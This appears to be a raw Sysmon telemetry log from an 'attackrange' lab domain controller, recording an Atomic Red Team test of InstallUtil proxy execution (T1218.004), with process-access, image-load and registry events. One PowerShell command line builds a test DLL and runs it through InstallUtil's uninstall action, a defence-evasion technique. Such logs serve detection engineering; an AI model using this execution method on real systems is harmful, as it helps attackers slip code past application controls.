14:22:51.347{8B6011A9-78BA-618E-2DF7-04000000F101}1563552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3566|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45fb9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+456aaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b379(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a2d74(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a29fc(wow64) 10341000x800000000000000057457640Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057457639Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BA-618E-2DF7-04000000F101}1563552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45fb9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+456aaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b379(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a2d74(wow64) 154100x800000000000000057457638Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /logfile= /logtoconsole=false /installtype=notransaction /action=uninstall C:\Users\ADMINI~1\AppData\Local\Temp\2\T1218.004.dll C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71{8B6011A9-78BA-618E-2DF7-04000000F101}156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly . C:\AtomicRedTeam\atomics\T1218.004\src\InstallUtilTestHarness.ps1 $InstallerAssemblyDir = \""$Env:TEMP\\"" $InstallerAssemblyFileName = \""T1218.004.dll\"" $InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName $CommandLine = \""/logfile= /logtoconsole=false /installtype=notransaction /action=uninstall `\""$InstallerAssemblyFullPath`\""\"" $ExpectedOutput = 'Constructor_Uninstall_' $TestArgs = @{ OutputAssemblyDirectory = $InstallerAssemblyDir OutputAssemblyFileName = $InstallerAssemblyFileName InvocationMethod = 'Executable' CommandLine = $CommandLine } $ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs if ($ActualOutput -ne $ExpectedOutput) { throw @\"" InstallUtil Uninstall method execution test failure. Installer assembly execution output did not match the expected output. Expected: $ExpectedOutput Actual: $ActualOutput \""@ }} 534500x800000000000000057458374Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.490{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe 734700x800000000000000057458373Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.474{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057458372Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.474{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057458371Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.474{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000057458370Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.474{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057458369Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.474{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057458368Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.474{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 734700x800000000000000057458367Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\e1c9eb2e855d26a67dbf39e6236430de\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=695EB4BE24FC9DB279F2427D31AD35D4,SHA256=014EDA5BD7025A6F01BEA1F6E05663FE4BCE64FA95B7378EBF9C827991B32E64false-Unavailable 734700x800000000000000057458366Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\5b778442ed2d60a5de14f752a124bf1a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=9EAA59368783AFE4107F28B6ED8AB1E6,SHA256=BBAC50983BA9B2EDA9CBA8FD0F1DCABF71D24D736A973BA164AF6917A3FC2E7Ffalse-Unavailable 734700x800000000000000057458365Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\625a7ccd665c33cee4988e3cd136b902\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=27741782AAECFE54A201896D93BA1C9A,SHA256=7389517EE682897300DE398245D2C3EE37E5060CF6320138430A8AA86E6E737Bfalse-Unavailable 734700x800000000000000057458364Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057458363Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057458362Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057458361Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057458360Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 13241300x800000000000000057458359Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057458358Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057458357Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057458356Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057458355Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.459{8B6011A9-886B-6164-0B00-00000000F101}6489732C:\Windows\system32\lsass.exe{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057458354Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.459{8B6011A9-886B-6164-0B00-00000000F101}6489732C:\Windows\system32\lsass.exe{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057458353Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 12241200x800000000000000057458352Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057458351Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057458350Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057458349Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057458348Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057458347Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.459{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 734700x800000000000000057458346Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.443{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 734700x800000000000000057458345Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.443{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 734700x800000000000000057458344Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.443{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time 